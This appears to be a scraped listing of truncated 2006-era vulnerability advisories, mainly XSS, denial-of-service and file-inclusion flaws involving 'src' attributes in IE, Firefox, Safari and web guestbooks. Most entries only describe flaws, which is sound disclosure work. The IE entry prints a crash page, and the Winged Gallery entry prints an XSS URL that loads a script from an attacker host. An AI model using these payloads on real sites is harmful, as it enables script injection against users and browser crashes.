Microsoft Internet Explorer Frame Src拒绝服务漏洞

Microsoft Internet Explorer是一款流行的WEB浏览器。 Microsoft Internet Explorer处理Frame src存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 提交类似如下的页面，诱使用户打开，可导致应用程序崩溃： html frameset rows="1000%" frame src="?" /html Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 - Microsoft Windows 2000 Advanced Server SP2...

CVE-2006-6310

Microsoft Internet Explorer 6.0 SP1 and earlier allows remote attackers to cause a denial of service crash via an invalid src attribute value "?" in an HTML frame tag that is in a frameset tag with a large rows attribute. NOTE: The provenance of this information is unknown; the details are obtain...

Spaminator <= 1.7 (page) Remote File Include Vulnerability

No description provided by source. Spaminator 1.7. $page Remote File Include CreW: ToXiC BuG Found By Drago84 SourcE CodE: http://freshmeat.net/redir/spaminator/16281/urltgz/spaminator-1.7.tar.gz Page Affect is: /src/Login.php Problem is include "$page.php"; Path : Declare $page ExpL:...

CVE-2006-6277

Directory traversal vulnerability in admin/FileServer.php in ContentServ 4.x allows remote attackers to read arbitrary files via a .. dot dot in the src parameter, a different vector than CVE-2005-3086...

PT-2006-5778 · Matrix · Matrix

Name of the Vulnerable Software and Affected Versions: Matrix versions after 3.8 Description: The issue allows remote attackers to use the application as an HTTP proxy server via a MIME encoded URL in the sq content src parameter. This can be used to access arbitrary sites with the server's IP...

CVE-2003-1305

Microsoft Internet Explorer allows remote attackers to cause a denial of service resource consumption via a Javascript src attribute that recursively loads the current web page...

CVE-2006-3665

SquirrelMail 1.4.6 and earlier, with registerglobals enabled, allows remote attackers to hijack cookies in src/redirect.php via unknown vectors. NOTE: while "cookie theft" is frequently associated with XSS, the vendor disclosure is too vague to be certain of this...

CVE-2006-3538

Multiple cross-site scripting XSS vulnerabilities in demo.php in BeatificFaith Eprayer Alpha allow remote attackers to inject arbitrary web script or HTML via the SRC attribute of a SCRIPT element in the 1 "Your name" field and 2 "Enter Prayer Request here" field...

Winged Gallery v1.0

Winged Gallery v1.0 Homepage: http://winged.info/index.php?p=gallery XSS vuln on thumb.php: http://example.com/gallery/thumb.php?image=data/Example+Folder/firefox+icon.jpg"''"""SCRIPT20SRC=http://youfucktard.com/xss.js/SCRIPT"''''&size=75&type=2&w=128&h=128"''"""...

CVE-2006-2991

Multiple cross-site scripting XSS vulnerabilities in Ringlink 3.2 allow remote attackers to inject arbitrary web script or HTML via a JavaScript URI in the SRC attribute of an IMG element, and possibly other manipulations, in the ringid parameter in 1 next.cgi, 2 stats.cgi, or 3 list.cgi...

CVE-2006-2991

CVE-2006-2991 describes multiple XSS vulnerabilities in Ringlink 3.2. The issue arises via a JavaScript URI in the SRC attribute of an IMG element (ringid parameter) in next.cgi, stats.cgi, or list.cgi. Affected component: Ringlink 3.2; vulnerability class: cross-site scripting; impact per NVD me...

CVE-2006-2975

Multiple cross-site scripting XSS vulnerabilities in pblguestbook.php in PBL Guestbook 1.31 allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of IMG tags in the 1 name, 2 email, and 3 website parameter, which bypasses XSS protection mechanisms that...

CVE-2006-2969

Cross-site scripting XSS vulnerability in L0j1k tinyMuw 0.1.0 allow remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the input box in quickchat.php, and possibly other manipulations...

Cross site scripting

Cross-site scripting XSS vulnerability in Lycos Tripod htmlGEAR guestGEAR aka Guest Gear allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element,...

CVE-2006-2808

Cross-site scripting XSS vulnerability in Lycos Tripod htmlGEAR guestGEAR aka Guest Gear allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element,...

CVE-2006-2785

Cross-site scripting XSS vulnerability in Mozilla Firefox before 1.5.0.4 allows user-assisted remote attackers to inject arbitrary web script or HTML by tricking a user into 1 performing a "View Image" on a broken image in which the SRC attribute contains a Javascript URL, or 2 selecting "Show on...

Cross site scripting

Cross-site scripting XSS vulnerability in view.php in TuttoPhp 1 Morris Guestbook 1, 2 Pretty Guestbook 1, and 3 Smile Guestbook 1 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the pagina parameter...

PT-2006-3297 · Mozilla · Firefox

Name of the Vulnerable Software and Affected Versions: Mozilla Firefox version 1.5.0.3 Description: The issue allows remote attackers to cause a denial of service via a web page with a large number of IMG elements in which the SRC attribute is a mailto URI. It was noted that the web page caused a...

Design/Logic Flaw

Apple Safari 2.0.3 allows remote attackers to cause a denial of service and possibly execute code via an invalid FRAME tag, possibly due to 1 multiple SCROLLING attributes with no values, or 2 a SRC attribute with no value. NOTE: due to lack of diagnosis by the researcher, it is unclear which...

security flaw

The WYSIWYG rendering engine "rich mail" editor in Mozilla Thunderbird 1.0.7 and earlier allows user-assisted attackers to bypass javascript security settings and obtain sensitive information or cause a crash via an e-mail containing a javascript URI in the SRC attribute of an IFRAME tag, which i...